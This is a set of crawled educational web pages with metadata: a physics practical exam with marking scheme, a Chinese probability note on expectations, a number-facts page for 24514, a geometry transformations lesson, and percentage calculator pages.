are invested in stocks.\n\n### History of Percentage\n\nBefore the Europeans learned about the decimal system, ancient Romans used fractions in the multiples of 1/100. An example was when Augustus levied a tax of 1/100 called centesima rerum venalium on goods sold at auctions. Computation with these fractions was similar to percentages.\nIn the Middle Ages, denominator of 100 became more common. By the 16th century, as decimal system became more common, use of percentage became a standard. It was used to compute profit and loss, interest rates etc.\n\n### Scholarship programs to learn math\n\nHere are some of the top scholarships available to students who wish to learn math." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9527469,"math_prob":0.9725933,"size":4438,"snap":"2023-40-2023-50","text_gpt3_token_len":1329,"char_repetition_ratio":0.30942714,"word_repetition_ratio":0.25993556,"special_character_ratio":0.3474538,"punctuation_ratio":0.055974167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9972827,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-07T02:57:48Z\",\"WARC-Record-ID\":\"<urn:uuid:f287d40e-b7fb-4bb1-b031-f8592db027bf>\",\"Content-Length\":\"16544\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:12a15e36-1e68-433e-b863-841b1f542fac>\",\"WARC-Concurrent-To\":\"<urn:uuid:79093055-0162-4883-8742-d23550ac21dd>\",\"WARC-IP-Address\":\"172.67.163.99\",\"WARC-Target-URI\":\"https://whatpercentcalculator.com/85-is-4-percent-of-what-number\",\"WARC-Payload-Digest\":\"sha1:2LJ4KZIQHMLRBZJXUMENBPAPUPAMSJT3\",\"WARC-Block-Digest\":\"sha1:AHITIG76HXOD6UJG433JXY22HLDDIHIV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100632.0_warc_CC-MAIN-20231207022257-20231207052257-00857.warc.gz\"}"}
https://www.easyelimu.com/kenya-secondary-schools-pastpapers/term-past-papers/form-3/item/3020-physics-paper-3-questions-and-answers-with-confidential-form-3-end-term-1-exams
[ "# Physics Paper 3 Questions and Answers with confidential - Form 3 End Term 1 Exams\n\nINSTRUCTIONS TO CANDIDATES\n\n• You are supposed to spend the first 15 minutes of the 2 1/4 hours allowed for this paper reading the whole paper carefully before commencing your work.\n• Marks are given for clear record of observations made, their suitability, accuracy and the use made of them.\n• Candidates are advised to record their observations as soon as they are made.\n• Non-programmable silent electronic calculators and KNEC mathematical table may be used.\n\nPART A\n\n1. You are provided with the following:\n• A retort stand, clamp and boss.\n• A spiral spring.\n• A stop watch.\n• Three 100g masses.\n• Three 50g masses.\n\nPROCEDURE\n1. Suspend a 100g mass at the end of a spiral spring as shown below.", null, "2. Now give the mass a small vertical displacement and release so that it performs vertical oscillation.\n3. Time for 20 oscillations and determine the period.\nEnter the result in the table below.\n4. Repeat the experiment for other values of mass given and complete the table.\n Mass m(g) 100 150 200 250 300 350 Time for 20 oscillations t (s) Period time T (s) T² (S²)\n6marks\n5. Plot a graph of T² (S²) (y –axis) against m (kg). (5marks)\n6. Determine the slope of the graph. (2marks)\n7. Given that T2=2mwhere k is the spring constant , use the graph to obtain the value of the spring constant k.  (2marks)\n\nPART B\n\nYou are provided with the following\n• 5 optical pins\n• A rectangular glass block\n• A plain paper\n• A soft board\n• 4 thumb pins\n\nProceed as follows\n8. Fix the white piece of paper on the soft board using thumb pins. Place the glass block on the white paper and draw the outline of the block.\n9. Remove the glass block and indicate the sides A, B, C and D as shown.", null, "10. On side BC, determine its center and fix a pin P0 as shown. Looking from one side at the opposite end of the slab, fix pin P1 and then pin P2 so that they are in line with the image I of the pin P0 .On the other side locate the same image using pins P3 and P4 as shown above.\n11. Remove the glass block and the pins and produce lines P1P2 and P3P4 to their points of intersection; (the position of the image I) (1mark)\n12. Determine the midpoint of AD and label it Q. Measure the lengths QP0 and Q1. (2marks)\nQP0 =..............................cm\nQ1 =.................................cm\n13. Work out the ratio =QPO  =n (1mark)\nQ1\n14. What does n represent (1mark)\n2. You are provided with the following;-\n• two retort stands\n• a metre rule\n• some cotton thread (approximately 1.2m long)\n• a ball of plasticine\n• a stop watch\n• a protractor\n• half metre rule\n\nProceed as follows:\n1.\n1. Attach one end of a string to the metre rule at 10cm by fastening a loop of string tightly round the metre rule. Fix the string at this point with a small piece of plasticine. Tie the other end of the string around the metre rule at the 90cm mark. Fix this loop with another small piece of plasticine.\n2. Attach the pendulum bob to the centre of the string so that the centre of gravity of the bob is 15.0cm below the point of suspension (see figure below)", null, "marks: refix the plasticine\nmeasure the angle 2Ө and period T, as before.\n3. Repeat (ii) above with the loops at 15cm and 85cm, 20cm and 80cm, 25cm and 75cm , 30cm and 70cm, 35cm and 65cm\n4. Enter all your results in the table below: (7mks)\n Position of loop 2θ Cos θ Time , t for 10 oscillations Period, T  (sec) T2(S2) 10cm and 90cm 12cm and 88cm 15cm and 85cm 20cm and 80cm 25cm and 75cm 30cm and 70cm 35 cm and 65cm\n2.\n1. On the grid provided plot a graph of T2(S2) (y-axis) against Cosθ (5mks)\n2. Find the intercept on the T2-axis (1mk)\n3. Determine the slope of your graph (2mks)\n3.\n1. Measure the angle 2θ\n2. Pull the pendulum towards you through a small distance, releases it and measure the period, T for motion by timing 10complete oscillations\n3. Remove the pasticine slide the loops to the 12cm and 88cm\n4.\n1. Measure the length, L, of the pendulum when 2θ= 0° in metres (1mk)\n2. From your graph, determine the period T of the pendulum when\n2θ = 0° (2mks)\n3. Using the formula T =2πl/g determine the value of ‘g’ given that T= 2.0 (2mks)", null, "## Marking Scheme\n\n1.\n1.\n2.\n3.\n\n4. Mass m(g) 100 150 200 250 300 350 Time for 20 oscillations t (s) 6.59 8.03 9.6 10.91 11.57 12.56 Period time T (s) 0.3295 0.4015 0.48 0.5455 0.5785 0.628 T² (S²) 0.1086 0.1612 0.2304 0.2976 0.3347 0.3944\n\n• For t each correct value      ½mk max 3mks\n• For T all values correct       2mks more than 3 correct\n1mk less than three correct 0mk.      max 2mks\n• For T² all values correct      1mk max 1mk\n5.", null, "6. Gradient = ∆Y = ∆T² = 0.25-0   ✔1  =1.111 s²/kg ✔¹\n∆X     ∆m    0.225-0\n7. y = mx +c\nT²=π² M+0 =Slope=π²\nK                      K\nK=  π²    ✔ =  π² = 8.972N/m ✔\nslope        1.11\n8. Lines P1P2 & P3P4 intersecting at I ✔\n9. QP0 = 10.0cm✔\nQ1= 6.6 cm✔\n10. n = QP0 = 10.0 =  1.5152✔\nQI       6.6\n11. Refractive index✔\n2.\n1. Position of loop 2θ θ Cos θ Time , t for 10 oscillations Period, T  (sec) T2(S2) 10cm and 90cm 165° 82.5° 0.1305 0.917 0.917 0.841 12cm and 88cm 133° 66.5° 0.3987 1.135 1.135 1.288 15cm and 85cm 120° 60° 0.50 1.190 1.190 1.416 20cm and 80cm 97° 48.5° 0.6626 1.303 1.303 1.698 25cm and 75cm 78° 39° 0.771 1.370 1.370 1.877 30cm and 70cm 60° 30° 0.8660 1.420 1.420 2.016 35 cm and 65cm 45° 22.5° 0.9239 1.470 1.470 2.161\n2.\n1. Plotting – atleast 5pts correctly plotted (2mks)\n3 or 4 pts (1mk)\nAxes 1mk\nScale 1mk\nLine(1mk\n2. Intercept – 0.63, 0.252(1mk)\n3.\n4.\n1. L=0.55m\nT2 = 2.2s2\nT = 1.483s\n2. T=2πl/g\nT2 = 4π2. l/g\n2.2 = 0.55 x 4π2\ng\ng=9.87", null, "## CONFIDENTIAL\n\nQUESTION 1\n\nEach candidate will require the following\n\n• A retort stand, clamp and boss\n• A spiral spring (k= 10 N /m)\n• A stop watch\n• Three 100g masses\n• Three 50g masses\n• 5 optical pinS\n• A rectangular glass block (100x 60x 18 mm)\n• A white plain paper\n• A soft board\n• 4 thumb pins\n\nQUESTION 2\n\nEach candidate should be provided with\n\n• Two retort stands\n• a metre rule\n• some cotton thread (approximately 1.2m long)\n• a ball of plasticine\n• a stop watch\n• a protractor\n• half metre rule\n\n#### Download Physics Paper 3 Questions and Answers with confidential - Form 3 End Term 1 Exams.\n\n• ✔ To read offline at any time.\n• ✔ To Print at your convenience\n• ✔ Share Easily with Friends / Students" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxNjIiIGhlaWdodD0iMTcwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNTciIGhlaWdodD0iMTM2Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0MDkiIGhlaWdodD0iMTczIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMzYiIGhlaWdodD0iMjgwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNDQiIGhlaWdodD0iNDYwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMzYiIGhlaWdodD0iMjgwIj48L3N2Zz4=", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7932057,"math_prob":0.97817785,"size":6303,"snap":"2023-14-2023-23","text_gpt3_token_len":2129,"char_repetition_ratio":0.109223686,"word_repetition_ratio":0.12358643,"special_character_ratio":0.36474696,"punctuation_ratio":0.1434659,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9753976,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-30T21:18:51Z\",\"WARC-Record-ID\":\"<urn:uuid:8dad893e-79be-414a-8f55-4a1a40c5d8b2>\",\"Content-Length\":\"167749\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15ff22be-92bf-47b2-93d3-f80951b7ca8d>\",\"WARC-Concurrent-To\":\"<urn:uuid:26f23101-e5ff-4397-bbc2-b1b929d812fb>\",\"WARC-IP-Address\":\"75.119.156.104\",\"WARC-Target-URI\":\"https://www.easyelimu.com/kenya-secondary-schools-pastpapers/term-past-papers/form-3/item/3020-physics-paper-3-questions-and-answers-with-confidential-form-3-end-term-1-exams\",\"WARC-Payload-Digest\":\"sha1:7HP2AMRFSI7O72IOPPBDDH44TSE2WOTR\",\"WARC-Block-Digest\":\"sha1:X2CF57G2LUDEREGWC4P7657FYBE2UWEW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224646144.69_warc_CC-MAIN-20230530194919-20230530224919-00751.warc.gz\"}"}
https://face2ai.com/Math-Probability-4-1-The-Expectation-of-a-Random-Variable-P2/index.html
[ "Abstract: 本篇介绍期望的第二部分,关于随机变量的函数的期望\nKeywords: Expectation\n\n# 随机变量的期望\n\n## 函数的期望 The Expecatation of a function\n\n### 单随机变量的函数 Function of a Single Random Variable\n\nFunction of a Single Random Variable : If $X$ is a random variable for which the p.d.f. is $f$ ,then the expectation of each real-valued function $r(X)$ can be found by applying the definition of expectation to the distribution of $r(X)$ as follows:Let $Y=r(X)$ ,determine the probability distribution of $Y$ ,and then determine $E(Y)$ by applying either expectation for a discrete distribution or expectation for a continous distribution.For example suppose that $Y$ has a continuous distribution with the p.d.f. $g$ .Then\n$$E[r(X)]=E(Y)=\\int^{\\infty}_{-\\infty}yg(y)dy$$\n\n$$f(x)= \\begin{cases} 3x^2&\\text{ if }0<x<1\\\\ 0&\\text{oterwise} \\end{cases}$$\n\n$$g(y)= \\begin{cases} 3y^{-4}&\\text{ if }y>1\\\\ 0&\\text{oterwise} \\end{cases}$$\n\n$$E(Y)=\\int^{\\infty}_{0}y^3y^{-4}dy=\\frac{3}{2}$$\n\nTheorem Law of the Unconscious Statistician.Let $X$ be a random varibale,and let $r$ be a real-valued function of a real variable.If $X$ has a continuous distribution,then\n$$E[r(x)]=\\int^{\\infty}_{-\\infty}r(x)f(x)dx$$\nIf the mean exists.If X has a discrete distribution ,then\n$$E[r(X)]=\\sum_{\\text{All } x}r(x)f(x)$$\nif the mean exists.\n\n$$\\sum_{y}yg(y)=\\sum_{y}yPr[r(x)=y]\\\\ =\\sum_{y}y\\sum_{x:r(x)=y}f(x)\\\\ =\\sum_{y}\\sum_{x:r(x)=y}r(x)f(x)=\\sum_{x}r(x)f(x)$$\nQ.E.D\n\n### 多随机变量的函数 Function of Several Random Variables\n\nTheorem Law of Unconscious Statistician:Suppose $X_1,\\dots,X_n$ are random variables with the joint p.d.f $f(x_1,\\dots,x_n)$ Let $r$ be a real-valued function of $n$ real varibales,and suppose that $Y=r(X_1,\\dots,X_n)$ .Then $E(Y)$ can be determined directly from the relation\n$$E(Y)=\\underbrace{\\int\\dots\\int}_{R_n}r(x_1,\\dots,x_n)f(x_1,\\dots,x_n)$$\nif the mean exists.Similarly ,if $X_1,\\dots,X_n$ have a discrete joint distribution with p.f. $f(x_1,\\dots,x_n)$ the mean of $Y=r(X_1,\\dots,X_n)$ is\n$$E(Y)=\\sum_{\\text{All }x_1,\\dots,x_n}r(x_1,\\dots,x_n)r(x_1,\\dots,x_n)f(x_1,\\dots,x_n)$$\nif the mean exists\n\n0%" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7805301,"math_prob":0.9999993,"size":3527,"snap":"2021-04-2021-17","text_gpt3_token_len":2224,"char_repetition_ratio":0.11694579,"word_repetition_ratio":0.025889968,"special_character_ratio":0.28239298,"punctuation_ratio":0.11329305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000099,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-20T12:08:48Z\",\"WARC-Record-ID\":\"<urn:uuid:10304d78-bdba-45da-82bb-6322bb2a8449>\",\"Content-Length\":\"59177\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6c13a85-c79f-4052-a229-e2505db25218>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ea59deb-54bb-42be-a15c-9ea5ad979ba3>\",\"WARC-IP-Address\":\"185.199.111.153\",\"WARC-Target-URI\":\"https://face2ai.com/Math-Probability-4-1-The-Expectation-of-a-Random-Variable-P2/index.html\",\"WARC-Payload-Digest\":\"sha1:ZWDAKKZSHJ4LAQW6KAR4NMO4J6RC7RP2\",\"WARC-Block-Digest\":\"sha1:FSOVHQUHBYZHKAGHWR4BBA5SDCFNMB3D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703520883.15_warc_CC-MAIN-20210120120242-20210120150242-00315.warc.gz\"}"}
https://metanumbers.com/24514
[ "## 24514\n\n24,514 (twenty-four thousand five hundred fourteen) is an even five-digits composite number following 24513 and preceding 24515. In scientific notation, it is written as 2.4514 × 104. The sum of its digits is 16. It has a total of 4 prime factors and 16 positive divisors. There are 9,792 positive integers (up to 24514) that are relatively prime to 24514.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 5\n• Sum of Digits 16\n• Digital Root 7\n\n## Name\n\nShort name 24 thousand 514 twenty-four thousand five hundred fourteen\n\n## Notation\n\nScientific notation 2.4514 × 104 24.514 × 103\n\n## Prime Factorization of 24514\n\nPrime Factorization 2 × 7 × 17 × 103\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 4 Total number of prime factors rad(n) 24514 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 24,514 is 2 × 7 × 17 × 103. Since it has a total of 4 prime factors, 24,514 is a composite number.\n\n## Divisors of 24514\n\n1, 2, 7, 14, 17, 34, 103, 119, 206, 238, 721, 1442, 1751, 3502, 12257, 24514\n\n16 divisors\n\n Even divisors 8 8 4 4\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 16 Total number of the positive divisors of n σ(n) 44928 Sum of all the positive divisors of n s(n) 20414 Sum of the proper positive divisors of n A(n) 2808 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 156.569 Returns the nth root of the product of n divisors H(n) 8.73006 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 24,514 can be divided by 16 positive divisors (out of which 8 are even, and 8 are odd). The sum of these divisors (counting 24,514) is 44,928, the average is 2,808.\n\n## Other Arithmetic Functions (n = 24514)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 9792 Total number of positive integers not greater than n that are coprime to n λ(n) 816 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 2714 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 9,792 positive integers (less than 24,514) that are coprime with 24,514. And there are approximately 2,714 prime numbers less than or equal to 24,514.\n\n## Divisibility of 24514\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 2 4 4 0 2 7\n\nThe number 24,514 is divisible by 2 and 7.\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n## Base conversion (24514)\n\nBase System Value\n2 Binary 101111111000010\n3 Ternary 1020121221\n4 Quaternary 11333002\n5 Quinary 1241024\n6 Senary 305254\n8 Octal 57702\n10 Decimal 24514\n12 Duodecimal 1222a\n20 Vigesimal 315e\n36 Base36 iwy\n\n## Basic calculations (n = 24514)\n\n### Multiplication\n\nn×i\n n×2 49028 73542 98056 122570\n\n### Division\n\nni\n n⁄2 12257 8171.33 6128.5 4902.8\n\n### Exponentiation\n\nni\n n2 600936196 14731349908744 361124311662950416 8852601376105566497824\n\n### Nth Root\n\ni√n\n 2√n 156.569 29.0495 12.5128 7.54889\n\n## 24514 as geometric shapes\n\n### Circle\n\n Diameter 49028 154026 1.8879e+09\n\n### Sphere\n\n Volume 6.17065e+13 7.55159e+09 154026\n\n### Square\n\nLength = n\n Perimeter 98056 6.00936e+08 34668\n\n### Cube\n\nLength = n\n Surface area 3.60562e+09 1.47313e+13 42459.5\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 73542 2.60213e+08 21229.7\n\n### Triangular Pyramid\n\nLength = n\n Surface area 1.04085e+09 1.73611e+12 20015.6\n\n## Cryptographic Hash Functions\n\nmd5 e9c1f3f42d92dc3d6f18596cb04e307f a89f9163d8e84dfea8838d37e612544f84de9133 20a4bdfb33506b1ee7b634391bcc4976eb79ff3b030ee7379865e81a1977f82f fe5035a92b9baa2247fdb71a72ed1b713fa25dfb538911096936af23e088752f9c07c79076c08b1a89da92c1abd885c831e18795755fa22a49dfe0ec804c2de6 a5db5ed796ed8cbbe48657a0c946da8b1fd45443" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6180903,"math_prob":0.97741526,"size":4489,"snap":"2020-34-2020-40","text_gpt3_token_len":1586,"char_repetition_ratio":0.11973244,"word_repetition_ratio":0.03402367,"special_character_ratio":0.451771,"punctuation_ratio":0.07522698,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995641,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-21T20:21:52Z\",\"WARC-Record-ID\":\"<urn:uuid:58dbc09d-8355-483d-b987-e7016201d8e9>\",\"Content-Length\":\"48039\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d7d14810-52c6-4449-bd01-fa684273501f>\",\"WARC-Concurrent-To\":\"<urn:uuid:583c55e6-23c1-42fe-96fe-89a2ff90962a>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/24514\",\"WARC-Payload-Digest\":\"sha1:DCPUOTETLYCI2ULAOE7GXE37YJV6FE24\",\"WARC-Block-Digest\":\"sha1:PXNWDZENQVSV477ZQDLPAR5TPOL5AISU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400202007.15_warc_CC-MAIN-20200921175057-20200921205057-00783.warc.gz\"}"}
https://im.kendallhunt.com/MS/students/3/1/4/index.html
[ "# Lesson 4\n\nMaking the Moves\n\nLet’s draw and describe translations, rotations, and reflections.\n\n### 4.1: Reflection Quick Image\n\nHere is an incomplete image. Your teacher will display the completed image twice, for a few seconds each time. Your job is to complete the image on your copy.\n\n### 4.2: Make That Move\n\nYour partner will describe the image of this triangle after a certain transformation. Sketch it here.\n\n### 4.3: A to B to C\n\nHere are some figures on an isometric grid. Explore the transformation tools in the tool bar. (Directions are below the applet if you need them.)\n\n1. Name a transformation that takes Figure A to Figure B. Name a transformation that takes Figure B to Figure C.\n\n2. What is one sequence of transformations that takes Figure A to Figure C? Explain how you know.\n\nTranslate\n\n2. Click on the original point and then the new point. You should see a vector.\n4. Click on the figure to translate, and then click on the vector.\n\nRotate\n\n2. Click on the figure to rotate, and then click on the center point.\n3. A dialog box will open. Type the angle by which to rotate and select the direction of rotation.\n\nReflect\n\n2. Click on the figure to reflect, and then click on the line of reflection.\n\nExperiment with some other ways to take Figure $$A$$ to Figure $$C$$. For example, can you do it with. . .\n\n• No rotations?\n• No reflections?\n• No translations?\n\n### Summary\n\nA move, or combination of moves, is called a transformation. When we do one or more moves in a row, we often call that a sequence of transformations. To distinguish the original figure from its image, points in the image are sometimes labeled with the same letters as the original figure, but with the symbol $$’$$ attached, as in $$A’$$ (pronounced “A prime”).\n\n• A translation can be described by two points. If a translation moves point $$A$$ to point $$A’$$, it moves the entire figure the same distance and direction as the distance and direction from $$A$$ to $$A’$$. The distance and direction of a translation can be shown by an arrow.\n\nFor example, here is a translation of quadrilateral $$ABCD$$ that moves $$A$$ to $$A’$$.\n\n• A rotation can be described by an angle and a center. The direction of the angle can be clockwise or counterclockwise.\n\nFor example, hexagon $$ABCDEF$$ is rotated $$90^\\circ$$ counterclockwise using center $$P$$.\n\n• A reflection can be described by a line of reflection (the “mirror”). Each point is reflected directly across the line so that it is just as far from the mirror line, but is on the opposite side.\n\nFor example, pentagon $$ABCDE$$ is reflected across line $$m$$.\n\n### Glossary Entries\n\n• clockwise\n\nClockwise means to turn in the same direction as the hands of a clock. The top turns to the right. This diagram shows Figure A turned clockwise to make Figure B.\n\n• counterclockwise\n\nCounterclockwise means to turn opposite of the way the hands of a clock turn. The top turns to the left.\n\nThis diagram shows Figure A turned counterclockwise to make Figure B.\n\n• image\n\nAn image is the result of translations, rotations, and reflections on an object. Every part of the original object moves in the same way to match up with a part of the image.\n\nIn this diagram, triangle $$ABC$$ has been translated up and to the right to make triangle $$DEF$$. Triangle $$DEF$$ is the image of the original triangle $$ABC$$.\n\n• reflection\n\nA reflection across a line moves every point on a figure to a point directly on the opposite side of the line. The new point is the same distance from the line as it was in the original figure.\n\nThis diagram shows a reflection of A over line $$\\ell$$ that makes the mirror image B.\n\n• rotation\n\nA rotation moves every point on a figure around a center by a given angle in a specific direction.\n\nThis diagram shows Triangle A rotated around center $$O$$ by 55 degrees clockwise to get Triangle B.\n\n• sequence of transformations\n\nA sequence of transformations is a set of translations, rotations, reflections, and dilations on a figure. The transformations are performed in a given order.\n\nThis diagram shows a sequence of transformations to move Figure A to Figure C.\n\nFirst, A is translated to the right to make B. Next, B is reflected across line $$\\ell$$ to make C.\n\n• transformation\n\nA transformation is a translation, rotation, reflection, or dilation, or a combination of these.\n\n• translation\n\nA translation moves every point in a figure a given distance in a given direction.\n\nThis diagram shows a translation of Figure A to Figure B using the direction and distance given by the arrow.\n\nThe vertices in this polygon are labeled $$A$$, $$B$$, $$C$$, $$D$$, and $$E$$." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8811746,"math_prob":0.99688756,"size":4826,"snap":"2023-40-2023-50","text_gpt3_token_len":1088,"char_repetition_ratio":0.16486935,"word_repetition_ratio":0.04337632,"special_character_ratio":0.23539163,"punctuation_ratio":0.11758474,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9992993,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T00:31:24Z\",\"WARC-Record-ID\":\"<urn:uuid:6219751d-d88e-483d-905e-184a858c17c3>\",\"Content-Length\":\"132721\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:df7fdea4-ab6a-4d50-90af-e174407638e0>\",\"WARC-Concurrent-To\":\"<urn:uuid:03d6cd8f-e783-4ce9-a612-cec37dd5b2b0>\",\"WARC-IP-Address\":\"3.232.242.170\",\"WARC-Target-URI\":\"https://im.kendallhunt.com/MS/students/3/1/4/index.html\",\"WARC-Payload-Digest\":\"sha1:TUNIH6NES5T5XSWAI3ZO75XRAUWJE7R5\",\"WARC-Block-Digest\":\"sha1:VNTOCX3QVV2QY4DHTK5SG2WDBFANHHGZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510942.97_warc_CC-MAIN-20231002001302-20231002031302-00788.warc.gz\"}"}
https://www.percentagecal.com/answer/1.500-is-what-percent-of-6000
[ "#### Solution for 1.500 is what percent of 6000:\n\n1.500:6000*100 =\n\n(1.500*100):6000 =\n\n150:6000 = 0.025\n\nNow we have: 1.500 is what percent of 6000 = 0.025\n\nQuestion: 1.500 is what percent of 6000?\n\nPercentage solution with steps:\n\nStep 1: We make the assumption that 6000 is 100% since it is our output value.\n\nStep 2: We next represent the value we seek with {x}.\n\nStep 3: From step 1, it follows that {100\\%}={6000}.\n\nStep 4: In the same vein, {x\\%}={1.500}.\n\nStep 5: This gives us a pair of simple equations:\n\n{100\\%}={6000}(1).\n\n{x\\%}={1.500}(2).\n\nStep 6: By simply dividing equation 1 by equation 2 and taking note of the fact that both the LHS\n(left hand side) of both equations have the same unit (%); we have\n\n\\frac{100\\%}{x\\%}=\\frac{6000}{1.500}\n\nStep 7: Taking the inverse (or reciprocal) of both sides yields\n\n\\frac{x\\%}{100\\%}=\\frac{1.500}{6000}\n\n\\Rightarrow{x} = {0.025\\%}\n\nTherefore, {1.500} is {0.025\\%} of {6000}.\n\n#### Solution for 6000 is what percent of 1.500:\n\n6000:1.500*100 =\n\n(6000*100):1.500 =\n\n600000:1.500 = 400000\n\nNow we have: 6000 is what percent of 1.500 = 400000\n\nQuestion: 6000 is what percent of 1.500?\n\nPercentage solution with steps:\n\nStep 1: We make the assumption that 1.500 is 100% since it is our output value.\n\nStep 2: We next represent the value we seek with {x}.\n\nStep 3: From step 1, it follows that {100\\%}={1.500}.\n\nStep 4: In the same vein, {x\\%}={6000}.\n\nStep 5: This gives us a pair of simple equations:\n\n{100\\%}={1.500}(1).\n\n{x\\%}={6000}(2).\n\nStep 6: By simply dividing equation 1 by equation 2 and taking note of the fact that both the LHS\n(left hand side) of both equations have the same unit (%); we have\n\n\\frac{100\\%}{x\\%}=\\frac{1.500}{6000}\n\nStep 7: Taking the inverse (or reciprocal) of both sides yields\n\n\\frac{x\\%}{100\\%}=\\frac{6000}{1.500}\n\n\\Rightarrow{x} = {400000\\%}\n\nTherefore, {6000} is {400000\\%} of {1.500}.\n\nCalculation Samples" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8320159,"math_prob":0.999892,"size":2262,"snap":"2022-27-2022-33","text_gpt3_token_len":803,"char_repetition_ratio":0.16961913,"word_repetition_ratio":0.43832022,"special_character_ratio":0.46507517,"punctuation_ratio":0.16920152,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999949,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T19:41:31Z\",\"WARC-Record-ID\":\"<urn:uuid:227b8c88-38db-436e-9089-5eb2f98d677f>\",\"Content-Length\":\"10485\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:67b53ee6-6963-4f15-b582-fd9d3cd4f1f8>\",\"WARC-Concurrent-To\":\"<urn:uuid:600c5d53-ac58-4e36-a829-dc8c40bd4120>\",\"WARC-IP-Address\":\"217.23.5.136\",\"WARC-Target-URI\":\"https://www.percentagecal.com/answer/1.500-is-what-percent-of-6000\",\"WARC-Payload-Digest\":\"sha1:C3WLUIHEMWSCWELRBIGH2G7VXEUV4CMO\",\"WARC-Block-Digest\":\"sha1:VRU3Z2U2HON76WJRXITZOGGTIDDKQZYR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573760.75_warc_CC-MAIN-20220819191655-20220819221655-00427.warc.gz\"}"}
